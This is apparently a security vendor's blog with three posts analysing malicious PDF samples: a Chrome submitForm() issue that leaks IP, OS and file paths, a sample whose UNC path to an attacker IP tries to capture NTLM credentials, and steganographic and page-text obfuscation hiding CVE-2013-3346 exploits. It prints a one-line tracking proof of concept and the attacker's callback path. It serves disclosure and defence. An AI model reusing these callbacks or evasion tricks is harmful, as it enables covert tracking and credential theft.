Tuesday, February 26, 2019

EdgeSpot detects PDF samples tracking users who use Google Chrome as local PDF viewer

Summary
Since late December 2018, EdgeSpot has detected multiple PDF samples in the wild which exploit a Google Chrome zero-day unpatched flaw. The exploited vulnerability allows the sender of the PDF files to track the users and collect some user's information when they use Google Chrome as a local PDF viewer.


Details
Since late last December, some interesting PDF samples were found by our engine. These samples acted as “no problem” when opened in popular Adobe Reader, however, they made suspicious outbound traffic when they're opened locally on Google Chrome.

While we have detected a number of such samples, we use a typical one as an example as we’re examining the details (we will list the samples we detected at the end of this blog post). The sample is:

Our engine detects the sample(s) as "POTENTIAL ZERO-DAY ATTACK (Google Chrome), PERSONAL INFORMATION LEAKAGE", as shown in the following image.

Note: Our description of the threat may change from time to time, for example, when a patch is released and the threat assigned a CVE ID is no longer "zero-day", description will be updated accordingly.

When the sample is opened in Google Chrome from our local disk, the content is shown below:


By capturing traffic in the background, we observed that some outbound traffic has been made, and data was sent to the domain "readnotify.com" while there's no user interaction, in other words, the data was sent out silently without the user’s approval.

The traffic is a HTTP POST packet, as shown in the following Wireshark window.



The PDF was "phoning home" in the background when the user was viewing it.

According to the HTTP packet, following information of the user may be collected by the malicious sender:
  1. The public IP address of the user.
  2. OS, Chrome version etc (in HTTP POST header).
  3. The full path of the PDF file on user's computer (in HTTP POST payload).
Recently, we've experienced some other PDF "phoning home" zero-day issues, including the one we discovered and disclosed in last November (as an ITW zero-day attack), and the very recent one discovered by @insertScript (our engine was able to detect this threat in advance). Unlike previous finds, this new sample has some differences:
  1. This one affects Google Chrome (as local PDF viewer), not Adobe Reader.
  2. This one does not allow NTLM stealing, but it leaks your OS information and the path of the file stored on your local disk.
We analysed the sample(s), and found there is some suspicious Javascript code in stream-1.


After deobfuscated the code, we found  the root is the "this.submitForm()" PDF Javascript API.
We tested it with a minimal PoC, a simple API call like "this.submitForm('http://google.com/test')" will make Google Chrome send the personal information to google.com.

We filed a report to Google as soon as we confirmed it is a zero-day unpatched issue, following is the timeline.

2018.12.26 Finding reported to Google
2019.02.12 More samples were detected during the period
2019.02.14 After multiple communications with the Chrome team, we were informed the issue will be landed on official Chrome in late April. Chrome team were informed about this blog post release
2019.02.26 Blog post released*

*We decided to release our finding prior to the patch because we think it's better to give the affected users a chance to be informed/alerted of the potential risk, since the active exploits/samples are in the wild while the patch is not near away.
As a temporary “workaround”, we suggest concerned users using alternative PDF reader application for viewing received PDF documents locally until Chrome fixes the issue, or disconnect computer from the Internet when open PDF documents in Chrome.

After we reported the first sample to Google, we kept finding more and more samples related to this vulnerability. In total, we’ve found two categories of such samples so far. The first category  is that samples with the similar in-the-wild filenames sent data to the domain “readnotify.com” and all appeared on VT on 2017-10-01, which makes us believe they were from the same source. They are:

The second category is one sample which appeared on VT on 2018-09-26 collects the personal information and sends it to “http://zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net”.


Conclusion
This kind of "info leak" threat (privacy issue) is not easy to detect especially when specific application (in this case, Google Chrome) is affected, however, our engine looks into samples much deeper with our innovative “file structure -oriented analysis” approach, and we can find the suspicious patterns and detect samples more precisely. So, when you encounter any suspicious samples or doubt if they are advanced attacks, try edgespot.io and see what it detects!

Follow us @EdgeSpot_io



[Update on Feb. 28]
After our original post on Tuesday, it seems that there're some misunderstandings in media reports about this case. We wanted to clarify that 1) The issue/bug described here does NOT allow remote code execute, nor it allows to steal arbitrary data from the user. 2) the issue/bug only affects users who use Chrome as local PDF viewer (for those who concern about their privacy). If you use Chrome for Internet browsing (not for local PDF viewer), there's really nothing to worry about.

We used the term "zero-day" simply based on we found the abused issue/bug works on latest Chrome, not mean it's a critical remote code execution issue.



[Update on Feb. 28]
We're reporting another sample (the third category) which is related to this unpatched Chrome issue/bug. Compared to the previous two categories which may be legitimate usages, this one is more likely to be involved in malicious activities.

The sample is:

The content looks like the following:


This single PDF sample took 3 stages to do bad things, in above image, we highlighted the 3 blocks for these 3 stages (from top to bottom).

1. The block-1 shows an obfuscated Javascript stream using octal encoding. After decoding (via "alert()"), the plain Javascript code is:



As we have analysed previously, the root of this unpatched Chrome issue (or bug) is about the "this.submitForm()" API. Since the decoded Javascript is calling this API, apparently, the actor is trying to track the user (if the user uses Chrome to open the PDF from local disk).
2. For block-2, the URI: \\\\52.210.81.127@80\\mf1ob8k1b5x2ykne8ep1wswtrlmjaz\\mPbjEw8CoTTrJug3RvLyDXxwMwWr1tZz.txt The interesting point is that the block-2 seems to using the "@80" to make the outbound traffic goes through TCP 80. Different than the traditional way of stealing NTLM hashes going through SMB ports and those ports are usually blocked by Firewalls, this method allows the attacker to bypass the Firewall. We also saw that, unlike the previous ones, when connected to the server on port 80, the server (52.210.81.127) responded with a ‘WWW-Authenticate: Basic realm="Authentication Required"’ in the HTTP response header - to our knowledge, this is usually used to start a web-based authentication process, which more or less indicates that the actor is trying to steal something.


We should note our readers that the theory we wrote here for this block-2 is not confirmed. We have tested the block-2 with Adobe Reader, Chrome, and Edge, it seems they do not support such way of remote access via port 80. A possibility is that the actor was trying to attack some PDF reader application that we didn’t test, or such attacking attempt works under certain conditions. We will update here if we find anything new.
3. The block-3 is a traditional method of exploiting the Adobe Reader vulnerability CVE-2018-4993, trying to steal user's NTLM credential through SMB ports.

As of writing, the actor’s server at 52.210.81.127 is still active, both TCP 80 and 445 are open. You may want to block this IP address for your organization.

As a wrap-up for this analysis, this interesting PDF sample uses multiple (three) methods for tracking users and/or stealing users’ (NTLM) credentials. It uses the unpatched Chrome issue/bug to track the user if the PDF is opened in Chrome (block-1), it also uses the vulnerability CVE-2018-4993 with an effort to steal user’s NTLM hash if the PDF is opened in affected Adobe Reader (that’s block-3), for block-2, it leaves us an interesting mystery.



Tuesday, January 22, 2019

"steganography" - obfuscating PDF exploits in depth

Shortly after last week's discovery of a PDF exploit which used the method of this.getPageNumWords() & this.getPageNthWord() for obfuscation, we found another, but much more powerful exploit obfuscation technique in PDF exploits. This technique uses a so-called "steganography" method to hide malicious Javascript code in images embedded in PDF files, it is so powerful as it could bypass almost all AV engines.

The sample was detected as "exploit CVE-2013-3346" by our EdgeLogic engine, same as the previous one.



The sample was first submitted to VirusTotal on 2017-10-10, with a filename "oral-b oxyjet spec.pdf".



Only 1 AV engine has detected this exploit last week (however, as of writing, the detection is increased to 5/57).



After opened, the PDF disguised as an IRS document looked normal.




Two layers of obfuscation were used in this sample. The first layer is what we have previously disclosed - the method of "this.getPageNumWords()" and "this.getPageNthWord()". The exploit uses "this.getPageNumWords()" and "this.getPageNthWord()" to read and execute the Javascript hidden as "content". The related code can be found in PDF stream-64.

stream-64

The second layer is new and it's our focus in this blog. The "Javascript content" is stored in stream-119, let's see what it looks like.



After beautifying the Javascript, it shows as following:




In order to figure out what the Javascript have done, we need to learn these two PDF JS APIs, the this.getIcon() and the util.iconStreamFromIcon() at first. Following is an extract from Adobe's reference.






According to the API references, these two APIs, working together, are to read the stream of an image named as "icon" stored in the PDF file.

By examining the above Javascript code, we figured out that the code’s function is to read and decode the "message" hidden in the icon’s stream. Once it read the "message" successfully , it will execute the "message" as Javascript code, via "eval(msg)".

The icon stream named "icon"  in the object-131 could be saved as a "jpg" file and viewed in image viewer without problem. As shown below:

The malicious data is hidden in the image while the image is still viewable

Nevertheless, there’s no suspicious data can be found inside the icon file, since the malicious code data is heavily obfuscated.

What does the final executed Javascript look like? Here is a piece of the real code, after successful de-obfuscating.



Therefore, we confirmed the exploited vulnerability is CVE-2013-3346.

Furthermore, we deduce that this sample and the previous one were from the same author, for following reasons.
  1. Both of them exploit the same vulnerability (CVE-2013-3346)
  2. The similarity of the Javascript code in these two exploits.
After some googling, we found that the attacker likely copied a project/technique called "steganography.js", which is open sourced here. The project was developed working on browsers. We believe the person behind the PDF samples made their innovation as they successfully leveraged the technique in PDF format.  We could not find any information mentioning such technique in PDF exploits before, so we believe this is the first time that the "steganography" technique is used to hide PDF exploits.


Conclusion
We were impressed by this technique, which is perfect for malicious code obfuscation for PDF exploits. By using this technique, all streams look normal, all images are viewable, everything looks legitimate. This can probably explain why almost all AV engines missed it.

In this blog we researched into the truly advanced "steganography" technique used for obfuscating PDF exploits, which is a demonstration of the power of our EdgeLogic engine as we are able to beat this obfuscation technique, among many others.

Just like the previous one, the "steganography" technique could not only be used to obfuscate this exploit (CVE-2013-3346) but also can be applied to many other PDF exploits including zero-days. We ask security defenders to pay close attention to it.

Follow us @EdgeSpot_io.

Monday, January 14, 2019

An interesting obfuscation method for PDF exploits (this.getPageNumWords() & this.getPageNthWord())

Recently, our EdgeLogic engine detected a malicious PDF sample, reported as "exploit CVE-2013-3346".





The sample first appeared on VirusTotal on 2017-10-06.






Although this sample is on VT for more than 1 year, most Av engines are unable to detect it.




Therefore it was brought to our attention when it was successfully detected by our engine. We analysed the sample manually. The stream of object-1 contains interesting JavaScript.




It uses PDF JS API this.getPageNumWords() and this.getPageNthWord() to "read" the Javascript contents on the PDF pages, then, it execute the Javascripts via eval(box).

We can see the object-6, object-8, and object-10 contains Javascript - but they are in "content" - used for object-1.



content of object-6

content of object-8

content of object-10


After some googling, we believe this is an exploit for PDF vulnerability CVE-2013-3346 for which FireEye had a blog in December 2013, and the exploit was not obfuscated at that time. Because of the obfuscation method, it remains largely undetected by AV engines.

The obfuscation method seems not new also, it was mentioned in a 2010 blog from F-Secure. However, as we have seen, the method is still quite effective.

When displayed on a non-vulnerable PDF reader, the PDF displays like this.


The above is for the 1st page. The PDF contains total 4 pages, the rest three pages are for the object-6, object-8, object-10, respectively. The exploit maker made the words on these three pages with very small size, but after zooming to 500% we could confirm that these are JS strings we found in object-6, object-8, and object-10.




Conclusion The obfuscation method described in this blog may not be new, but it is very effective to bypass many detection engines. More importantly, we should realize that such obfuscation method could be used to obfuscate not only this (CVE-2013-3346) exploit but many other PDF exploits including zero-days. This is another good example demonstrating the power of our EdgeLogic engine - we were able to beat the obfuscation method used in this PDF exploit. So, when you encounter some suspicious samples, no matter it is an email format (eml, msg), Office files (doc, xls, ppt), pdf, or even .zip, try edgespot.io and see what it detects!
Follow us @EdgeSpot_io.